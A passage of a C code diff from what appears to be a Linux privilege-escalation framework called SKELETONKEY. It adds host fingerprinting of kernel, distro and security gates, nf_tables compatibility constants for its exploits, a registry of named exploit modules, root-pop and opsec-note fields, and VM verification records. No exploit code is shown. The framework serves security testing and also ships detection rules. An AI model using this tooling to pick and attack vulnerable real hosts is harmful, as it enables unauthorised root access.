+		else if (strncmp(line, "VERSION_ID=", 11) == 0)
+			parse_os_release_value(line + 11,
+				h->distro_version_id, sizeof h->distro_version_id);
+		else if (strncmp(line, "PRETTY_NAME=", 12) == 0)
+			parse_os_release_value(line + 12,
+				h->distro_pretty, sizeof h->distro_pretty);
+	}
+	fclose(f);
+}
+
+static void populate_user(struct skeletonkey_host *h)
+{
+	h->euid = geteuid();
+	h->egid = getegid();
+	h->is_root = (h->euid == 0);
+	h->is_ssh_session = (getenv("SSH_CONNECTION") != NULL);
+
+	h->username[0] = '\0';
+	struct passwd *pw = getpwuid(h->euid);
+	if (pw && pw->pw_name)
+		snprintf(h->username, sizeof h->username, "%s", pw->pw_name);
+
+	/* Default: real_uid == euid (no userns). Try /proc/self/uid_map to
+	 * discover the outer uid if we're inside a user namespace. Format
+	 *
+	 *   "0 0 4294967295"      → init ns, outer == 0
+	 *   "0 1000 1"            → userns mapped, outer == 1000
+	 *
+	 * Only trust outer != 0 and != -1 as the bypass-userns case. */
+	h->real_uid = h->euid;
+	int fd = open("/proc/self/uid_map", O_RDONLY);
+	if (fd >= 0) {
+		char buf[256];
+		ssize_t n = read(fd, buf, sizeof buf - 1);
+		close(fd);
+		if (n > 0) {
+			buf[n] = '\0';
+			int inner = -1, outer = -1, count = 0;
+			if (sscanf(buf, "%d %d %d", &inner, &outer, &count) == 3 &&
+			    inner == 0 && outer > 0)
+				h->real_uid = (uid_t)outer;
+		}
+	}
+}
+
+static void populate_platform_family(struct skeletonkey_host *h)
+{
+#ifdef __linux__
+	h->is_linux = true;
+#else
+	h->is_linux = false;
+#endif
+	h->is_debian_family = path_exists("/etc/debian_version");
+	h->is_rpm_family    = path_exists("/etc/redhat-release") ||
+	                      path_exists("/etc/fedora-release") ||
+	                      path_exists("/etc/rocky-release") ||
+	                      path_exists("/etc/almalinux-release");
+	h->is_arch_family   = path_exists("/etc/arch-release");
+	h->is_suse_family   = path_exists("/etc/SuSE-release") ||
+	                      path_exists("/etc/SUSE-brand");
+}
+
+#ifdef __linux__
+/* fork+unshare(CLONE_NEWUSER) probe. Forks once; ~1ms cost. */
+static bool userns_probe(void)
+{
+	pid_t pid = fork();
+	if (pid < 0) return false;
+	if (pid == 0) {
+		_exit(unshare(CLONE_NEWUSER) == 0 ? 0 : 1);
+	}
+	int st;
+	if (waitpid(pid, &st, 0) < 0) return false;
+	return WIFEXITED(st) && WEXITSTATUS(st) == 0;
+}
+#endif
+
+static void populate_caps(struct skeletonkey_host *h)
+{
+	h->unprivileged_userns_allowed = false;
+	h->apparmor_restrict_userns    = false;
+	h->unprivileged_bpf_disabled   = false;
+	h->kpti_enabled                = false;
+	h->meltdown_mitigation[0]      = '\0';
+	h->kernel_lockdown_active      = false;
+	h->selinux_enforcing           = false;
+	h->yama_ptrace_restricted      = false;
+
+#ifdef __linux__
+	h->unprivileged_userns_allowed = userns_probe();
+
+	int v = 0;
+	if (read_int_file("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", &v))
+		h->apparmor_restrict_userns = (v != 0);
+	if (read_int_file("/proc/sys/kernel/unprivileged_bpf_disabled", &v))
+		h->unprivileged_bpf_disabled = (v != 0);
+	if (read_int_file("/sys/fs/selinux/enforce", &v))
+		h->selinux_enforcing = (v != 0);
+	if (read_int_file("/proc/sys/kernel/yama/ptrace_scope", &v))
+		h->yama_ptrace_restricted = (v > 0);
+
+	char buf[256];
+	if (read_first_line("/sys/devices/system/cpu/vulnerabilities/meltdown", buf, sizeof buf)) {
+		h->kpti_enabled = (strstr(buf, "Mitigation: PTI") != NULL);
+		/* Stash the raw value so modules that need richer matching
+		 * (e.g. entrybleed distinguishing "Not affected" CPUs from
+		 * "Vulnerable" / "Mitigation: PTI") don't re-read sysfs. */
+		size_t L = strlen(buf);
+		if (L >= sizeof h->meltdown_mitigation)
+			L = sizeof h->meltdown_mitigation - 1;
+		memcpy(h->meltdown_mitigation, buf, L);
+		h->meltdown_mitigation[L] = '\0';
+	}
+
+	/* /sys/kernel/security/lockdown format: "[none] integrity confidentiality"
+	 * — whichever level is bracketed is the active one. */
+	if (read_first_line("/sys/kernel/security/lockdown", buf, sizeof buf))
+		h->kernel_lockdown_active = (strstr(buf, "[none]") == NULL);
+#endif
+}
+
+static void populate_services(struct skeletonkey_host *h)
+{
+	h->has_systemd     = path_exists("/run/systemd/system");
+	h->has_dbus_system = path_exists("/run/dbus/system_bus_socket");
+}
+
+/* Best-effort: run `cmd`, capture first stdout line, strip newline,
+ * copy up to (cap - 1) bytes into dst. Returns true iff popen
+ * succeeded, the command exited 0, and we got at least one line.
+ * Used for sudo/pkexec/packagekitd version parsing at startup. */
+static bool capture_first_line(const char *cmd, char *dst, size_t cap)
+{
+	dst[0] = '\0';
+	FILE *p = popen(cmd, "r");
+	if (!p) return false;
+	char buf[256];
+	bool got = (fgets(buf, sizeof buf, p) != NULL);
+	int rc = pclose(p);
+	if (!got || rc != 0) return false;
+	size_t L = strlen(buf);
+	while (L > 0 && (buf[L-1] == '\n' || buf[L-1] == '\r'))
+		buf[--L] = '\0';
+	if (L >= cap) L = cap - 1;
+	memcpy(dst, buf, L);
+	dst[L] = '\0';
+	return true;
+}
+
+/* Extract the version-string token from a line of the form
+ * "<prefix>: <version> [rest]" or "<prefix> <version> [rest]". The
+ * version token is everything from the first non-space after
+ * `prefix` up to the next whitespace. Empty result when prefix not
+ * found. */
+static void extract_version_after_prefix(const char *line,
+					 const char *prefix,
+					 char *dst, size_t cap)
+{
+	dst[0] = '\0';
+	const char *p = strstr(line, prefix);
+	if (!p) return;
+	p += strlen(prefix);
+	while (*p == ' ' || *p == ':' || *p == '\t') p++;
+	size_t i = 0;
+	while (*p && *p != ' ' && *p != '\t' && i + 1 < cap)
+		dst[i++] = *p++;
+	dst[i] = '\0';
+}
+
+static void populate_userspace_versions(struct skeletonkey_host *h)
+{
+	h->sudo_version[0]   = '\0';
+	h->polkit_version[0] = '\0';
+
+	char line[256];
+	if (capture_first_line("sudo -V 2>/dev/null", line, sizeof line))
+		extract_version_after_prefix(line, "Sudo version",
+			h->sudo_version, sizeof h->sudo_version);
+
+	if (capture_first_line("pkexec --version 2>/dev/null", line, sizeof line))
+		extract_version_after_prefix(line, "pkexec version",
+			h->polkit_version, sizeof h->polkit_version);
+}
+
+/* ── public entrypoints ───────────────────────────────────────────── */
+
+const struct skeletonkey_host *skeletonkey_host_get(void)
+{
+	if (g_host_ready) return &g_host;
+
+	memset(&g_host, 0, sizeof g_host);
+	populate_kernel(&g_host);
+	populate_distro(&g_host);
+	populate_user(&g_host);
+	populate_platform_family(&g_host);
+	populate_caps(&g_host);
+	populate_services(&g_host);
+	populate_userspace_versions(&g_host);
+	g_host.probe_source = "skeletonkey core/host.c";
+	g_host_ready = true;
+	return &g_host;
+}
+
+bool skeletonkey_host_kernel_at_least(const struct skeletonkey_host *h,
+				      int major, int minor, int patch)
+{
+	if (!h || h->kernel.major == 0)
+		return false;
+	if (h->kernel.major != major) return h->kernel.major > major;
+	if (h->kernel.minor != minor) return h->kernel.minor > minor;
+	return h->kernel.patch >= patch;
+}
+
+bool skeletonkey_host_kernel_in_range(const struct skeletonkey_host *h,
+				      int lo_M, int lo_m, int lo_p,
+				      int hi_M, int hi_m, int hi_p)
+{
+	return  skeletonkey_host_kernel_at_least(h, lo_M, lo_m, lo_p) &&
+	       !skeletonkey_host_kernel_at_least(h, hi_M, hi_m, hi_p);
+}
+
+void skeletonkey_host_print_banner(const struct skeletonkey_host *h, bool json)
+{
+	if (json || h == NULL) return;
+	fprintf(stderr, "[*] host: %s%s%s  kernel=%s  arch=%s  distro=%s/%s\n",
+		h->nodename[0] ? h->nodename : "?",
+		h->is_root ? "  (ROOT)" : "",
+		h->is_ssh_session ? "  (SSH)" : "",
+		h->kernel.release ? h->kernel.release : "?",
+		h->arch[0] ? h->arch : "?",
+		h->distro_id[0] ? h->distro_id : "?",
+		h->distro_version_id[0] ? h->distro_version_id : "?");
+	fprintf(stderr, "[*] gates: userns=%s  aa_restrict=%s  bpf_disabled=%s  "
+			"kpti=%s  lockdown=%s  selinux=%s  yama_ptrace=%s\n",
+		h->unprivileged_userns_allowed ? "yes" : "no",
+		h->apparmor_restrict_userns    ? "on"  : "off",
+		h->unprivileged_bpf_disabled   ? "yes" : "no",
+		h->kpti_enabled                ? "on"  : "off",
+		h->kernel_lockdown_active      ? "on"  : "off",
+		h->selinux_enforcing           ? "on"  : "off",
+		h->yama_ptrace_restricted      ? "yes" : "no");
+	if (h->sudo_version[0] || h->polkit_version[0])
+		fprintf(stderr, "[*] userspace: sudo=%s  polkit=%s\n",
+			h->sudo_version[0]   ? h->sudo_version   : "-",
+			h->polkit_version[0] ? h->polkit_version : "-");
+}
@@ -0,0 +1,142 @@
+/*
+ * SKELETONKEY — host fingerprint
+ *
+ * Populated once at startup, before any module's detect() runs. Every
+ * module receives a stable pointer via skeletonkey_ctx.host and can
+ * consult it without re-parsing /proc, /etc/os-release, uname(2), or
+ * forking another userns probe.
+ *
+ * The struct is deliberately POD (no heap pointers, fixed-size
+ * arrays) so lifetime reasoning is trivial. A single static instance
+ * lives in core/host.c; skeletonkey_host_get() returns the same
+ * pointer on every call. The first call probes; subsequent calls
+ * are O(1) lookups.
+ *
+ * Fields that don't apply on a given platform (e.g. AppArmor sysctls
+ * on a non-Linux dev build, KPTI on aarch64) stay at their false /
+ * "?" defaults. Probing is best-effort: a missing sysctl never fails
+ * the call, just leaves the corresponding bool false.
+ */
+
+#ifndef SKELETONKEY_HOST_H
+#define SKELETONKEY_HOST_H
+
+#include "kernel_range.h"
+
+#include <stdbool.h>
+#include <stddef.h>
+#include <sys/types.h>
+
+struct skeletonkey_host {
+	/* ── identity ─────────────────────────────────────────────── */
+
+	struct kernel_version kernel;     /* uname.release parsed */
+	char arch[32];                    /* uname.machine ("x86_64", "aarch64") */
+	char nodename[64];                /* uname.nodename (for log lines) */
+
+	char distro_id[64];               /* /etc/os-release ID ("ubuntu", "debian", "fedora", "?") */
+	char distro_version_id[64];       /* /etc/os-release VERSION_ID ("24.04", "13", "?") */
+	char distro_pretty[128];          /* /etc/os-release PRETTY_NAME for log lines */
+
+	/* ── process state ─────────────────────────────────────────── */
+
+	uid_t euid;                       /* geteuid() */
+	uid_t real_uid;                   /* outer uid (defeats userns illusion via /proc/self/uid_map) */
+	gid_t egid;                       /* getegid() */
+	char username[64];                /* getpwuid(euid)->pw_name or "" */
+	bool is_root;                     /* euid == 0 */
+	bool is_ssh_session;              /* SSH_CONNECTION env var set */
+
+	/* ── platform family ───────────────────────────────────────── */
+
+	bool is_linux;                    /* compiled / running on Linux */
+	bool is_debian_family;            /* /etc/debian_version exists */
+	bool is_rpm_family;               /* redhat / fedora / rocky / almalinux release file */
+	bool is_arch_family;              /* /etc/arch-release */
+	bool is_suse_family;              /* /etc/SuSE-release or /etc/SUSE-brand */
+
+	/* ── capability / gate flags (Linux) ──────────────────────── */
+
+	bool unprivileged_userns_allowed; /* fork+unshare(CLONE_NEWUSER) succeeded */
+	bool apparmor_restrict_userns;    /* sysctl: 1 = AA blocks unpriv userns */
+	bool unprivileged_bpf_disabled;   /* /proc/sys/kernel/unprivileged_bpf_disabled = 1 */
+	bool kpti_enabled;                /* /sys/.../meltdown contains "Mitigation: PTI" */
+	char meltdown_mitigation[64];     /* raw first line of
+	                                   * /sys/devices/system/cpu/vulnerabilities/meltdown
+	                                   * — empty string if unreadable. Modules that need
+	                                   * to distinguish "Not affected" (CPU immune) from
+	                                   * "Mitigation: PTI" / "Vulnerable" can read this. */
+	bool kernel_lockdown_active;      /* /sys/kernel/security/lockdown != [none] */
+	bool selinux_enforcing;           /* /sys/fs/selinux/enforce = 1 */
+	bool yama_ptrace_restricted;      /* /proc/sys/kernel/yama/ptrace_scope > 0 */
+
+	/* ── system services ──────────────────────────────────────── */
+
+	bool has_systemd;                 /* /run/systemd/system exists */
+	bool has_dbus_system;             /* /run/dbus/system_bus_socket exists */
+
+	/* ── userspace component versions ─────────────────────────
+	 * Parsed once at startup via popen() of the relevant binary's
+	 * --version output. Empty string ("") means "tool not installed
+	 * or version parse failed" — modules should treat that as
+	 * PRECOND_FAIL (no exploit target). The exact format mirrors
+	 * what the tool prints (`Sudo version 1.9.5p2`, `pkexec version
+	 * 0.105`, …); modules do their own range parsing. */
+	char sudo_version[64];            /* "1.9.13p1" or "" */
+	char polkit_version[64];          /* "0.105" or "126" or "" */
+
+	/* Informational: the SKELETONKEY component that populated this
+	 * snapshot (for log/JSON output). */
+	const char *probe_source;
+};
+
+/* Get the host fingerprint. Returns a stable, non-null pointer that
+ * lives for the process lifetime. Probes happen lazily on the first
+ * call (~50ms; dominated by the userns fork-probe), are cached, and
+ * subsequent calls are free.
+ *
+ * Probing is best-effort: missing files / unsupported sysctls leave
+ * the corresponding bool false. The function does not fail. */
+const struct skeletonkey_host *skeletonkey_host_get(void);
+
+/* Print a two-line "host fingerprint" banner to stderr suitable for
+ * --auto / --scan verbose output. Silent on JSON mode. */
+void skeletonkey_host_print_banner(const struct skeletonkey_host *h, bool json);
+
+/* True iff h->kernel >= the (major, minor, patch) provided. Returns
+ * false if h is NULL or its kernel version was never populated (major
+ * == 0). Replaces the manual `v->major < X` / `(v->major == X &&
+ * v->minor < Y)` patterns scattered across detect()s — cleaner reads
+ * and one place to get the comparison right.
+ *
+ * Examples:
+ *   if (!host_kernel_at_least(h, 7, 0, 0))    // kernel predates 7.0
+ *       return SKELETONKEY_OK;
+ *   if ( host_kernel_at_least(h, 6, 8, 0))    // kernel post-fix
+ *       return SKELETONKEY_OK;
+ */
+bool skeletonkey_host_kernel_at_least(const struct skeletonkey_host *h,
+                                      int major, int minor, int patch);
+
+/* True iff h->kernel is in [lo, hi). Useful for "vulnerable range"
+ * gates where the simple `kernel_range_is_patched` backport model
+ * doesn't apply — e.g. a feature added in X.Y and removed/superseded
+ * in W.Z, or a per-module "vulnerable only on these specific kernel
+ * lines" check.
+ *
+ * Equivalent to:
+ *   host_kernel_at_least(h, lo...) && !host_kernel_at_least(h, hi...)
+ *
+ * For "predates the bug" alone use host_kernel_at_least directly; the
+ * `in_range` form is for the bounded interval case.
+ *
+ * Example:
+ *   if (host_kernel_in_range(h, 5, 8, 0,  5, 17, 0))
+ *       // kernel 5.8 ≤ K < 5.17 — vulnerable window per the mainline
+ *       // introduction/fix dates (ignoring stable backports)
+ */
+bool skeletonkey_host_kernel_in_range(const struct skeletonkey_host *h,
+                                      int lo_major, int lo_minor, int lo_patch,
+                                      int hi_major, int hi_minor, int hi_patch);
+
+#endif /* SKELETONKEY_HOST_H */
@@ -40,9 +40,12 @@ typedef enum {
    SKELETONKEY_EXPLOIT_OK      = 5,
 } skeletonkey_result_t;

-/* Per-invocation context passed to module callbacks. Lightweight for
- * now; will grow as modules need shared state (host fingerprint,
- * leaked kbase, etc.). */
+/* Per-invocation context passed to module callbacks. The host
+ * fingerprint (kernel / distro / capability gates / service presence)
+ * is populated once at startup by core/host.c and handed to every
+ * module callback here — see core/host.h. */
+struct skeletonkey_host;   /* forward decl; full def in core/host.h */
+
 struct skeletonkey_ctx {
    bool          no_color;     /* --no-color */
    bool          json;         /* --json (machine-readable output) */
@@ -50,6 +53,13 @@ struct skeletonkey_ctx {
    bool          no_shell;     /* --no-shell (exploit prep but don't pop) */
    bool          authorized;   /* user typed --i-know on exploit */
    bool          full_chain;   /* --full-chain (attempt root-pop after primitive) */
+    bool          dry_run;      /* --dry-run (preview only; never call exploit/mitigate/cleanup) */
+
+    /* Host fingerprint — see core/host.h. Stable pointer, populated
+     * once by main() before any module callback runs. Modules that
+     * want to consult it #include "../../core/host.h". May be NULL
+     * only in degenerate test contexts; main() always sets it. */
+    const struct skeletonkey_host *host;
 };

 struct skeletonkey_module {
@@ -94,6 +104,21 @@ struct skeletonkey_module {
    const char *detect_sigma;    /* sigma YAML content */
    const char *detect_yara;     /* yara rules content */
    const char *detect_falco;    /* falco rules content */
+
+    /* Operational-security notes — telemetry footprint THIS specific
+     * exploit leaves behind. The inverse of detect_auditd/yara/falco
+     * above (the rules catch what these notes describe). Free-form
+     * prose, conventionally listing: dmesg lines triggered, auditd
+     * events, file artifacts created/modified, persistence side-
+     * effects, recommended cleanup. Per-module (not per-CVE) because
+     * different exploits for the same bug can leave different
+     * footprints. NULL if no analysis written yet.
+     *
+     * NB: ATT&CK / CWE / KEV metadata is properties of the CVE itself
+     * (independent of exploit technique) and lives in
+     * core/cve_metadata.{h,c} — looked up by CVE id, refreshed via
+     * tools/refresh-cve-metadata.py. */
+    const char *opsec_notes;
 };

 #endif /* SKELETONKEY_MODULE_H */
@@ -0,0 +1,98 @@
+/*
+ * SKELETONKEY — nf_tables uapi compat shims.
+ *
+ * Older distro kernel headers (e.g. Ubuntu 20.04's linux-libc-dev ships
+ * the 5.4 uapi; Debian 11 ships 5.10) don't define every nft attribute
+ * or chain flag the exploits use. The numeric values are stable kernel
+ * ABI — the target kernel understands them at runtime regardless of
+ * what was present in the build host's uapi headers. Conditionally
+ * define them here so modules compile against any reasonable header set.
+ *
+ * Sources for the numeric values:
+ *   include/uapi/linux/netfilter/nf_tables.h in mainline at the kernel
+ *   version that introduced each enum.
+ *
+ * Include AFTER <linux/netfilter/nf_tables.h>.
+ */
+
+#ifndef SKELETONKEY_NFT_COMPAT_H
+#define SKELETONKEY_NFT_COMPAT_H
+
+#include <linux/netfilter/nf_tables.h>
+
+/* ── chain flags ─────────────────────────────────────────────────── */
+
+/* NFT_CHAIN_HW_OFFLOAD: kernel 5.5 (commit be0b86e0594d). Needed by
+ * nft_fwd_dup_cve_2022_25636. */
+#ifndef NFT_CHAIN_HW_OFFLOAD
+#define NFT_CHAIN_HW_OFFLOAD  0x2
+#endif
+
+/* NFT_CHAIN_BINDING: kernel 5.9 (commit d164385ec572). */
+#ifndef NFT_CHAIN_BINDING
+#define NFT_CHAIN_BINDING     0x4
+#endif
+
+/* ── chain attrs ─────────────────────────────────────────────────── */
+
+/* NFTA_CHAIN_FLAGS: kernel 5.7 (commit 65038428b2c6). Ubuntu 18.04's
+ * 4.15-era uapi lacks it. Position 10 in the enum
+ * (NFTA_CHAIN_TABLE=1..NFTA_CHAIN_USERDATA=9, NFTA_CHAIN_FLAGS=10). */
+#ifndef NFTA_CHAIN_FLAGS
+#define NFTA_CHAIN_FLAGS      10
+#endif
+
+/* NFTA_CHAIN_ID: kernel 5.13 (commit 837830a4b439). */
+#ifndef NFTA_CHAIN_ID
+#define NFTA_CHAIN_ID         11
+#endif
+
+/* ── verdict attrs ──────────────────────────────────────────────── */
+
+/* NFTA_VERDICT_CHAIN_ID: kernel 5.14 (commit 4ed8eb6570a4). Needed by
+ * nf_tables_cve_2024_1086. */
+#ifndef NFTA_VERDICT_CHAIN_ID
+#define NFTA_VERDICT_CHAIN_ID 3   /* CODE=1, CHAIN=2, CHAIN_ID=3 */
+#endif
+
+/* ── set attrs ──────────────────────────────────────────────────── */
+
+/* NFTA_SET_DESC_CONCAT: kernel 5.6 (commit 8aeff38e08d2 — concat sets). */
+#ifndef NFTA_SET_DESC_CONCAT
+#define NFTA_SET_DESC_CONCAT  2   /* DESC_SIZE=1, DESC_CONCAT=2 */
+#endif
+
+/* NFTA_SET_EXPR: kernel 5.12 (commit 65038428b2c6 — anon expr on sets). */
+#ifndef NFTA_SET_EXPR
+#define NFTA_SET_EXPR         13
+#endif
+
+/* NFTA_SET_EXPRESSIONS: kernel 5.16 (commit 48b0ae046ed4). */
+#ifndef NFTA_SET_EXPRESSIONS
+#define NFTA_SET_EXPRESSIONS  14
+#endif
+
+/* ── set-element attrs ──────────────────────────────────────────── */
+
+/* NFTA_SET_ELEM_KEY_END: kernel 5.6 (commit 7b225d0b5c5b). */
+#ifndef NFTA_SET_ELEM_KEY_END
+#define NFTA_SET_ELEM_KEY_END 7
+#endif
+
+/* NFTA_SET_ELEM_EXPRESSIONS: kernel 5.16 (commit 48b0ae046ed4). */
+#ifndef NFTA_SET_ELEM_EXPRESSIONS
+#define NFTA_SET_ELEM_EXPRESSIONS 11
+#endif
+
+/* ── data attrs (newer additions tend to be backported uneven) ──── */
+
+/* Make sure NFTA_DATA_VERDICT and friends exist — present since 3.13;
+ * here only as a tripwire if a very old header somehow lacks them. */
+#ifndef NFTA_DATA_VERDICT
+#define NFTA_DATA_VERDICT     2
+#endif
+#ifndef NFTA_DATA_VALUE
+#define NFTA_DATA_VALUE       1
+#endif
+
+#endif /* SKELETONKEY_NFT_COMPAT_H */
@@ -3,6 +3,11 @@
 *
 * Simple flat array. Resized in chunks of 16. We never expect more
 * than a few dozen modules, so this is fine.
+ *
+ * The canonical "register every family" enumeration lives in
+ * registry_all.c — kept separate so this file links into the
+ * standalone kernel_range unit-test binary without pulling in every
+ * module's symbol.
 */

 #include "registry.h"
@@ -40,5 +40,19 @@ void skeletonkey_register_nft_set_uaf(void);
 void skeletonkey_register_af_unix_gc(void);
 void skeletonkey_register_nft_fwd_dup(void);
 void skeletonkey_register_nft_payload(void);
+void skeletonkey_register_sudo_samedit(void);
+void skeletonkey_register_sequoia(void);
+void skeletonkey_register_sudoedit_editor(void);
+void skeletonkey_register_vmwgfx(void);
+void skeletonkey_register_dirtydecrypt(void);
+void skeletonkey_register_fragnesia(void);
+void skeletonkey_register_pack2theroot(void);
+
+/* Call every skeletonkey_register_<family>() above in canonical order.
+ * Single source of truth so the main binary and the test binary stay
+ * in sync — adding a new module is one register_* declaration here
+ * and one call inside skeletonkey_register_all_modules() in
+ * core/registry.c (the test harness picks it up automatically). */
+void skeletonkey_register_all_modules(void);

 #endif /* SKELETONKEY_REGISTRY_H */
@@ -0,0 +1,46 @@
+/*
+ * SKELETONKEY — canonical "register every module family" enumeration.
+ *
+ * Kept in its own translation unit so registry.c stays standalone:
+ * the kernel_range unit-test binary links registry.c (for the basic
+ * register / count / find API) without pulling in every module's
+ * symbol. The main binary and detect-integration test link this
+ * file too and get the full lineup.
+ *
+ * Adding a new module is one new register_<family>() declaration in
+ * registry.h plus one call below — the integration test picks it up
+ * via skeletonkey_register_all_modules() in its main().
+ */
+
+#include "registry.h"
+
+void skeletonkey_register_all_modules(void)
+{
+    skeletonkey_register_copy_fail_family();
+    skeletonkey_register_dirty_pipe();
+    skeletonkey_register_entrybleed();
+    skeletonkey_register_pwnkit();
+    skeletonkey_register_nf_tables();
+    skeletonkey_register_overlayfs();
+    skeletonkey_register_cls_route4();
+    skeletonkey_register_dirty_cow();
+    skeletonkey_register_ptrace_traceme();
+    skeletonkey_register_netfilter_xtcompat();
+    skeletonkey_register_af_packet();
+    skeletonkey_register_fuse_legacy();
+    skeletonkey_register_stackrot();
+    skeletonkey_register_af_packet2();
+    skeletonkey_register_cgroup_release_agent();
+    skeletonkey_register_overlayfs_setuid();
+    skeletonkey_register_nft_set_uaf();
+    skeletonkey_register_af_unix_gc();
+    skeletonkey_register_nft_fwd_dup();
+    skeletonkey_register_nft_payload();
+    skeletonkey_register_sudo_samedit();
+    skeletonkey_register_sequoia();
+    skeletonkey_register_sudoedit_editor();
+    skeletonkey_register_vmwgfx();
+    skeletonkey_register_dirtydecrypt();
+    skeletonkey_register_fragnesia();
+    skeletonkey_register_pack2theroot();
+}
@@ -0,0 +1,269 @@
+/*
+ * SKELETONKEY — verification records table
+ *
+ * AUTO-GENERATED by tools/refresh-verifications.py from
+ * docs/VERIFICATIONS.jsonl. Do not hand-edit; rerun the script.
+ *
+ * Source: tools/verify-vm/verify.sh appends one JSON record per
+ * run; this generator dedupes to (module, vm_box, kernel, expect)
+ * and keeps the latest by verified_at.
+ */
+
+#include "verifications.h"
+
+#include <stddef.h>
+#include <string.h>
+#include <stdbool.h>
+
+const struct verification_record verifications[] = {
+    {
+        .module        = "af_packet",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "4.15.0-213-generic",
+        .host_distro   = "Ubuntu 18.04.6 LTS",
+        .vm_box        = "generic/ubuntu1804",
+        .expect_detect = "OK",
+        .actual_detect = "OK",
+        .status        = "match",
+    },
+    {
+        .module        = "af_packet2",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.4.0-169-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "af_unix_gc",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.5-051505-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "cgroup_release_agent",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.10.0-27-amd64",
+        .host_distro   = "Debian GNU/Linux 11 (bullseye)",
+        .vm_box        = "generic/debian11",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "cls_route4",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-43-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "dirty_pipe",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-91-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "OK",
+        .actual_detect = "OK",
+        .status        = "match",
+    },
+    {
+        .module        = "entrybleed",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-91-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "fuse_legacy",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.10.0-27-amd64",
+        .host_distro   = "Debian GNU/Linux 11 (bullseye)",
+        .vm_box        = "generic/debian11",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "netfilter_xtcompat",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.10.0-27-amd64",
+        .host_distro   = "Debian GNU/Linux 11 (bullseye)",
+        .vm_box        = "generic/debian11",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "nf_tables",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.5-051505-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "nft_fwd_dup",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.10.0-27-amd64",
+        .host_distro   = "Debian GNU/Linux 11 (bullseye)",
+        .vm_box        = "generic/debian11",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "nft_payload",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-43-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "nft_set_uaf",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.5-051505-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "overlayfs",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.4.0-169-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "overlayfs_setuid",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.15.0-91-generic",
+        .host_distro   = "Ubuntu 22.04.3 LTS",
+        .vm_box        = "generic/ubuntu2204",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "pack2theroot",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "6.1.0-17-amd64",
+        .host_distro   = "Debian GNU/Linux 12 (bookworm)",
+        .vm_box        = "generic/debian12",
+        .expect_detect = "PRECOND_FAIL",
+        .actual_detect = "PRECOND_FAIL",
+        .status        = "match",
+    },
+    {
+        .module        = "ptrace_traceme",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "4.15.0-213-generic",
+        .host_distro   = "Ubuntu 18.04.6 LTS",
+        .vm_box        = "generic/ubuntu1804",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "pwnkit",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.4.0-169-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
+        .expect_detect = "VULNERABLE",
+        .actual_detect = "VULNERABLE",
+        .status        = "match",
+    },
+    {
+        .module        = "sequoia",
+        .verified_at   = "2026-05-23",
+        .host_kernel   = "5.4.0-169-generic",
+        .host_distro   = "Ubuntu 20.04.6 LTS",
+        .vm_box        = "generic/ubuntu2004",
